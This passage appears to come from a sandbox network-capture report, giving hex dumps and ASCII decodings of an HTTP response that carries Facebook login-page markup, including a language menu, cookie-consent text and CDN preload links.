73 65 6c 65 63 74 65 64 22
                                                                                                                                  Data Ascii: rItem"},{"class":"headerItem","value":"tr_TR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_j_UC"},"label":"T\u00fcrk\u00e7e","title":"","className":"headerItem"},{"class":"headerItem","value":"cs_CZ","selected"
                                                                                                                                  2022-10-17 20:07:09 UTC405INData Raw: 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 74 68 5f 54 48 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 71 5f 53 51 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 65 32 30 5c 75 30 65 33 32 5c 75 30 65 32 39 5c 75 30 65 33 32 5c 75 30 65 34 34 5c 75 30 65 31 37 5c 75 30 65 32 32 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22
                                                                                                                                  Data Ascii: Name":"headerItem"},{"class":"headerItem","value":"th_TH","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_q_SQ"},"label":"\u0e20\u0e32\u0e29\u0e32\u0e44\u0e17\u0e22","title":"","className":"headerItem"},{"class":"
                                                                                                                                  2022-10-17 20:07:09 UTC406INData Raw: 6e 54 72 61 6e 73 69 74 69 6f 6e 22 2c 22 4c 61 79 65 72 52 65 6d 6f 76 65 4f 6e 48 69 64 65 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 61 61 22 2c 22 48 54 4d 4c 22 5d 2c 5b 7b 22 77 69 64 74 68 22 3a 36 38 30 2c 22 61 75 74 6f 68 69 64 65 22 3a 6e 75 6c 6c 2c 22 74 69 74 6c 65 49 44 22 3a 6e 75 6c 6c 2c 22 72 65 64 69 72 65 63 74 55 52 49 22 3a 6e 75 6c 6c 2c 22 66 69 78 65 64 54 6f 70 50 6f 73 69 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 69 67 6e 6f 72 65 46 69 78 65 64 54 6f 70 49 6e 53 68 6f 72 74 56 69 65 77 70 6f 72 74 22 3a 66 61 6c 73 65 2c 22 6c 61 62 65 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 62 65 6c 6c 65 64 42 79 22 3a 22 6d 61 6e 61 67 65 5f 63 6f 6f 6b 69 65 73 5f 74 69 74 6c 65 22 2c 22 68 65 69 67 68 74 22 3a 35 31 38
                                                                                                                                  Data Ascii: nTransition","LayerRemoveOnHide","__markup_9f5fac15_0_0_aa","HTML"],[{"width":680,"autohide":null,"titleID":null,"redirectURI":null,"fixedTopPosition":null,"ignoreFixedTopInShortViewport":false,"label":null,"labelledBy":"manage_cookies_title","height":518
                                                                                                                                  2022-10-17 20:07:09 UTC407INData Raw: 33 43 61 20 72 6f 6c 65 3d 5c 22 62 75 74 74 6f 6e 5c 22 20 63 6c 61 73 73 3d 5c 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 35 70 69 20 5f 32 61 67 66 20 5f 34 6f 5f 34 20 5f 39 6f 2d 65 20 5f 70 20 5f 34 6a 79 33 20 5f 35 31 37 68 20 5f 35 31 73 79 5c 22 20 68 72 65 66 3d 5c 22 23 5c 22 20 73 74 79 6c 65 3d 5c 22 6d 61 78 2d 77 69 64 74 68 3a 32 30 30 70 78 3b 5c 22 20 61 72 69 61 2d 68 61 73 70 6f 70 75 70 3d 5c 22 74 72 75 65 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 5c 22 66 61 6c 73 65 5c 22 20 72 65 6c 3d 5c 22 74 6f 67 67 6c 65 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 38 5f 74 36 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 2d 78 65 20 5f 33 2d 38 5f 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20
                                                                                                                                  Data Ascii: 3Ca role=\"button\" class=\"_42ft _4jy0 _55pi _2agf _4o_4 _9o-e _p _4jy3 _517h _51sy\" href=\"#\" style=\"max-width:200px;\" aria-haspopup=\"true\" aria-expanded=\"false\" rel=\"toggle\" id=\"u_0_8_t6\">\u003Cspan class=\"_-xe _3-8_\">\u003Ci class=\"img
                                                                                                                                  2022-10-17 20:07:09 UTC409INData Raw: 69 63 65 73 20 66 6f 72 20 79 6f 75 2c 20 77 65 20 75 73 65 20 74 6f 6f 6c 73 20 66 72 6f 6d 20 6f 74 68 65 72 20 63 6f 6d 70 61 6e 69 65 73 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 20 54 68 65 73 65 20 63 6f 6d 70 61 6e 69 65 73 20 61 6c 73 6f 20 75 73 65 20 63 6f 6f 6b 69 65 73 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 33 5c 22 3e 59 6f 75 20 63 61 6e 20 61 6c 6c 6f 77 20 74 68 65 20 75 73 65 20 6f 66 20 61 6c 6c 20 63 6f 6f 6b 69 65 73 2c 20 6a 75 73 74 20 65 73 73 65 6e 74 69 61 6c 20 63 6f 6f 6b 69 65 73 20 6f 72 20 79 6f 75 20 63 61 6e 20 63 68 6f 6f 73 65 20 6d 6f 72 65 20 6f 70 74 69 6f 6e 73 20 62 65 6c 6f 77 2e 20 59 6f 75 20 63 61 6e 20 6c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74
                                                                                                                                  Data Ascii: ices for you, we use tools from other companies on Facebook. These companies also use cookies.\u003C\/div>\u003Cdiv class=\"_9xo3\">You can allow the use of all cookies, just essential cookies or you can choose more options below. You can learn more about
                                                                                                                                  2022-10-17 20:07:09 UTC410INData Raw: 5c 22 65 78 70 61 6e 64 61 62 6c 65 20 73 65 63 74 69 6f 6e 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 63 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 66 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6c 5c 22 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 67 20 5f 39 76 37 76 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 51 76 36 44 33 48 54 65 5a 55 59 20 73 78 5f 33 61 36 38 31 38 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 64
                                                                                                                                  Data Ascii: \"expandable section\">\u003Cdiv class=\"_9ngc\">\u003Cspan class=\"_9ngf\">\u003Cdiv class=\"_9o-l\">More information\u003C\/div>\u003C\/span>\u003Cspan class=\"_9ngg _9v7v\">\u003Ci class=\"img sp_Qv6D3HTeZUY sx_3a6818\">\u003C\/i>\u003C\/span>\u003C\/d
                                                                                                                                  2022-10-17 20:07:09 UTC412INData Raw: 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 61 5f 56 70 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e 67 65 5c 22 20 74 69 74 6c 65 3d 5c 22 65 78 70 61 6e 64 61 62 6c 65 20 73 65 63 74 69 6f 6e 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 63 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 66 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6c 5c 22 3e 43 6f 6e 74 72 6f 6c 73 20 69 6e 20 79 6f 75 72 20 46 61 63 65 62 6f 6f 6b 20 61 63 63 6f 75 6e 74 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e
                                                                                                                                  Data Ascii: iv>\u003Cdiv>\u003Cdiv class=\"_9vtg\" id=\"u_0_a_Vp\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expandable section\">\u003Cdiv class=\"_9ngc\">\u003Cspan class=\"_9ngf\">\u003Cdiv class=\"_9o-l\">Controls in your Facebook account\u003C\/div>\u003C\/span
                                                                                                                                  2022-10-17 20:07:09 UTC413INData Raw: 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 75 73 65 20 79 6f 75 72 20 61 64 20 70 72 65 66 65 72 65 6e 63 65 73 20 74 6f 20 6c 65 61 72 6e 20 77 68 79 20 79 6f 75 26 23 30 33 39 3b 72 65 20 73 65 65 69 6e 67 20 61 20 70 61 72 74 69 63 75 6c 61 72 20 61 64 20 61 6e 64 20 63 6f 6e 74 72 6f 6c 20 68 6f 77 20 77 65 20 75 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 68 61 74 20 77 65 20 63 6f 6c 6c 65 63 74 20 74 6f 20 73 68 6f 77 20 79 6f 75 20 61 64 73 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 4f 66 66 2d 46 61 63 65 62 6f 6f 6b 20 61 63 74 69 76 69 74 79 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f
                                                                                                                                  Data Ascii: \u003Cp class=\"_9o-m\">You can use your ad preferences to learn why you&#039;re seeing a particular ad and control how we use information that we collect to show you ads.\u003C\/p>\u003Cp class=\"_9si-\">Off-Facebook activity\u003C\/p>\u003Cp class=\"_9o
                                                                                                                                  2022-10-17 20:07:09 UTC415INData Raw: 20 74 68 72 6f 75 67 68 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 6f 70 74 6f 75 74 2e 61 62 6f 75 74 61 64 73 2e 69 6e 66 6f 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 32 2d 6e 53 58 58 51 43 76 65 51 6b 78 42 76 47 68 61 67 41 51 74 62 7a 57 35 42 58 66 6d 50 74 4b 56 37 33 72 46 75 57 78 78 6b 6d 37 65 32 51 55 31 47 45 5f 33 76 77 65 4c 38 6e 53 79 6e 57 2d 4c 4f 5f 56 6d 30 48 63 57 4b 35 41 6e 64 74 66 77 71 41 70 45 31 70 47 6f 54 32 4a 68 52 56 37 4c 73 32 64 59 54 6a 59 5f 37 6b 6d 5f 71 59 76 47 76 71 73 6e 65 45 53 30 56 68 41 52 57
                                                                                                                                  Data Ascii: through the \u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Foptout.aboutads.info\u00252F&amp;h=AT2-nSXXQCveQkxBvGhagAQtbzW5BXfmPtKV73rFuWxxkm7e2QU1GE_3vweL8nSynW-LO_Vm0HcWK5AndtfwqApE1pGoT2JhRV7Ls2dYTjY_7km_qYvGvqsneES0VhARW
                                                                                                                                  2022-10-17 20:07:09 UTC416INData Raw: 67 65 6e 65 72 61 6c 6c 79 20 75 73 65 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 73 69 6d 69 6c 61 72 20 74 65 63 68 6e 6f 6c 6f 67 69 65 73 20 61 73 20 70 61 72 74 20 6f 66 20 74 68 65 69 72 20 73 65 72 76 69 63 65 73 2e 20 54 6f 20 6c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 68 6f 77 20 61 64 76 65 72 74 69 73 65 72 73 20 67 65 6e 65 72 61 6c 6c 79 20 75 73 65 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 74 68 65 20 63 68 6f 69 63 65 73 20 74 68 65 79 20 6f 66 66 65 72 2c 20 79 6f 75 20 63 61 6e 20 72 65 76 69 65 77 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 72 65 73 6f 75 72 63 65 73 3a 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 75 6c 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 71 5c 22 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66
                                                                                                                                  Data Ascii: generally use cookies and similar technologies as part of their services. To learn more about how advertisers generally use cookies and the choices they offer, you can review the following resources:\u003C\/p>\u003Cul class=\"_9o-q\">\u003Cli>\u003Ca href
                                                                                                                                  2022-10-17 20:07:09 UTC418INData Raw: 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 63 5f 45 58 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e 67 65 5c 22 20 74 69 74 6c 65 3d 5c 22 65 78 70 61 6e 64 61 62 6c 65 20 73 65 63 74 69 6f 6e 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 63 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 66 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6c 5c 22 3e 43 6f 6e 74 72 6f 6c 6c 69 6e 67 20 63 6f 6f 6b 69 65 73 20 77 69 74 68 20 62 72 6f 77 73 65 72 20 73 65 74 74 69 6e 67 73 5c 75 30
                                                                                                                                  Data Ascii: div>\u003C\/div>\u003Cdiv>\u003Cdiv class=\"_9vtg\" id=\"u_0_c_EX\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expandable section\">\u003Cdiv class=\"_9ngc\">\u003Cspan class=\"_9ngf\">\u003Cdiv class=\"_9o-l\">Controlling cookies with browser settings\u0
                                                                                                                                  2022-10-17 20:07:09 UTC419INData Raw: 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 5c 75 30 30 32 35 32 46 65 6e 2d 69 65 5c 75 30 30 32 35 32 46 68 65 6c 70 5c 75 30 30 32 35 32 46 31 37 34 34 32 5c 75 30 30 32 35 32 46 77 69 6e 64 6f 77 73 2d 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2d 64 65 6c 65 74 65 2d 6d 61 6e 61 67 65 2d 63 6f 6f 6b 69 65 73 26 61 6d 70 3b 68 3d 41 54 32 6e 31 78 51 79 48 55 35 43 52 49 35 45 66 33 79 6e 4b 35 53 68 38 46 39 54 6d 46 51 48 62 34 74 30 56 2d 76 6c 56 61 4a 6d 61 45 51 55 58 69 41 51 78 56 4e 57 32 7a 35 79 42 6d 2d 6a 54 4a 6c 69 5a
                                                                                                                                  Data Ascii: \"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fsupport.microsoft.com\u00252Fen-ie\u00252Fhelp\u00252F17442\u00252Fwindows-internet-explorer-delete-manage-cookies&amp;h=AT2n1xQyHU5CRI5Ef3ynK5Sh8F9TmFQHb4t0V-vlVaJmaEQUXiAQxVNW2z5yBm-jTJliZ
                                                                                                                                  2022-10-17 20:07:09 UTC421INData Raw: 6a 54 4a 67 4b 35 30 52 32 30 6a 30 31 62 4c 4e 33 53 73 6b 34 33 52 72 5a 57 51 72 64 6d 41 4c 53 67 75 4e 70 67 65 79 65 51 35 47 53 61 2d 67 5a 77 6f 52 4c 77 53 53 62 4a 79 39 78 78 65 72 7a 6e 49 61 39 59 72 55 4a 4f 58 34 35 62 38 7a 44 56 51 46 4a 37 44 4e 65 68 7a 4e 45 57 4a 36 63 70 67 48 56 42 79 78 52 55 6b 4a 59 73 62 35 51 48 57 51 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 53 61 66 61 72 69 20 4d 6f 62 69 6c 65 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73
                                                                                                                                  Data Ascii: jTJgK50R20j01bLN3Ssk43RrZWQrdmALSguNpgeyeQ5GSa-gZwoRLwSSbJy9xxerznIa9YrUJOX45b8zDVQFJ7DNehzNEWJ6cpgHVByxRUkJYsb5QHWQ\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Safari Mobile\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https
                                                                                                                                  2022-10-17 20:07:09 UTC422INData Raw: 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 31 5f 77 57 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 44 61 6e 73 6b 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 32 5f 73 65 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 44 65 75 74 73 63 68 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 33 5f 4a 43 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 4b 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 34 5f 65 58 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 53 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 35 5f 79 5c 2f 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45
                                                                                                                                  Data Ascii: __markup_3310c079_0_1_wW",{"__html":"Dansk"},1],["__markup_3310c079_0_2_se",{"__html":"Deutsch"},1],["__markup_3310c079_0_3_JC",{"__html":"English (UK)"},1],["__markup_3310c079_0_4_eX",{"__html":"English (US)"},1],["__markup_3310c079_0_5_y\/",{"__html":"E
                                                                                                                                  2022-10-17 20:07:09 UTC424INData Raw: 36 34 61 5c 75 30 36 32 39 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 70 5f 79 57 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 39 33 39 5c 75 30 39 33 66 5c 75 30 39 32 38 5c 75 30 39 34 64 5c 75 30 39 32 36 5c 75 30 39 34 30 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 71 5f 53 51 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 65 32 30 5c 75 30 65 33 32 5c 75 30 65 32 39 5c 75 30 65 33 32 5c 75 30 65 34 34 5c 75 30 65 31 37 5c 75 30 65 32 32 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 72 5f 77 61 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 35 33 66 30 5c 75 37 30 36 33 29 22 7d 2c 31 5d 2c 5b
                                                                                                                                  Data Ascii: 64a\u0629"},1],["__markup_3310c079_0_p_yW",{"__html":"\u0939\u093f\u0928\u094d\u0926\u0940"},1],["__markup_3310c079_0_q_SQ",{"__html":"\u0e20\u0e32\u0e29\u0e32\u0e44\u0e17\u0e22"},1],["__markup_3310c079_0_r_wa",{"__html":"\u4e2d\u6587(\u53f0\u7063)"},1],[
                                                                                                                                  2022-10-17 20:07:09 UTC425INData Raw: 6f 72 6b 65 72 4c 6f 67 69 6e 41 6e 64 4c 6f 67 6f 75 74 22 2c 22 6c 6f 67 69 6e 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 53 63 72 69 70 74 50 61 74 68 22 2c 22 73 65 74 22 2c 5b 5d 2c 5b 22 58 57 65 62 4c 6f 67 69 6e 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 22 39 36 65 38 38 61 66 33 22 2c 7b 22 69 6d 70 5f 69 64 22 3a 22 31 77 33 43 66 42 6f 75 6b 70 6b 76 76 6f 75 77 77 22 2c 22 65 66 5f 70 61 67 65 22 3a 6e 75 6c 6c 2c 22 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e
                                                                                                                                  Data Ascii: orkerLoginAndLogout","login",[],[]],["ScriptPath","set",[],["XWebLoginController","96e88af3",{"imp_id":"1w3CfBoukpkvvouww","ef_page":null,"uri":"https:\/\/www.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fman
                                                                                                                                  2022-10-17 20:07:09 UTC426INData Raw: 31 64 34 38 0d 0a 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f 30 5f 45 35 22 2c 22 5f 5f 69 6e 73 74 5f 30 32 31 38 32 30 31 35 5f 30 5f 30 5f 6e 45 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f 30 5f 45 35 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 69 6e 73 74 5f 30 32 31 38 32 30 31 35 5f 30 5f 30 5f 6e 45 22 7d 2c 22 65 6e 5f 55 53 22 2c 74 72 75 65 2c 22 46 61 63 65 62 6f 6f 6b 22 5d 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 65 61 64 31 65 35 36 35 5f 30 5f 30 5f 2b 6e 22 5d 2c 5b 22 57 65 62 43 6f 6f 6b 69 65 55 73 65 53 69 6e 67 6c 65 4c 65 76 65 6c 4d 61 6e 61 67 65 44 69 61 6c 6f 67 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 69 6e 73 74 5f 65 61 64
                                                                                                                                  Data Ascii: 1d48","init",["__elem_ec77afbd_0_0_E5","__inst_02182015_0_0_nE"],[{"__m":"__elem_ec77afbd_0_0_E5"},{"__m":"__inst_02182015_0_0_nE"},"en_US",true,"Facebook"]],["__inst_ead1e565_0_0_+n"],["WebCookieUseSingleLevelManageDialogController","init",["__inst_ead
                                                                                                                                  2022-10-17 20:07:09 UTC427INData Raw: 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 34 5f 58 58 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 37 30 62 31 36 63 36 39 5f 30 5f 30 5f 38 62 22 7d 5d 5d 2c 5b 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 30 32 31 38 32 30 31 35 5f 30 5f 30 5f 6e 45 22 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 65 35 61 64 32 34 33 64 5f 30 5f 30 5f 30 45 22 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 31 64 65 31 34 36 64 63 5f 30 5f 30 5f 77 7a 22 5d 2c 5b 22 43 6f 6f 6b 69 65 41 63 63 6f 72 64 69 6f 6e 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 35 5f 54 43 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 35 5f 54 43 22
                                                                                                                                  Data Ascii: ,{"__m":"__elem_a588f507_0_4_XX"},{"__m":"__elem_70b16c69_0_0_8b"}]],["PageTransitions"],["__inst_02182015_0_0_nE"],["__inst_e5ad243d_0_0_0E"],["__inst_1de146dc_0_0_wz"],["CookieAccordion","init",["__elem_a588f507_0_5_TC"],[{"__m":"__elem_a588f507_0_5_TC"
                                                                                                                                  2022-10-17 20:07:09 UTC429INData Raw: 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 2e 6e 6f 77 28 29 2b 70 2e 74 69 6d 69 6e 67 2e 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 7d 3b 7d 29 28 29 3b 77 69 6e 64 6f 77 2e 5f 5f 62 69 67 50 69 70 65 46 52 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 47 2f 6c 2f 30 2c 63 72 6f 73 73 2f 5a 56 4f 35 73 37 4e 61 47 76 6d 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c
                                                                                                                                  Data Ascii: ction(){return p.now()+p.timing.navigationStart}:function(){return new Date().getTime()};})();window.__bigPipeFR=now_inl();</script><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yG/l/0,cross/ZVO5s7NaGvm.css?_nc_x=Ij3Wp8lg5Kz" as="styl
                                                                                                                                  2022-10-17 20:07:09 UTC430INData Raw: 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6e 6f 6e 63 65 3d 22 42 67 54 73 38 71 46 4d 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 58 2f 72 2f 6c 77 4a 64 4e 72 4a 30 6d 4a 6b 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6e 6f 6e 63 65 3d 22 42 67 54 73 38 71 46 4d 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 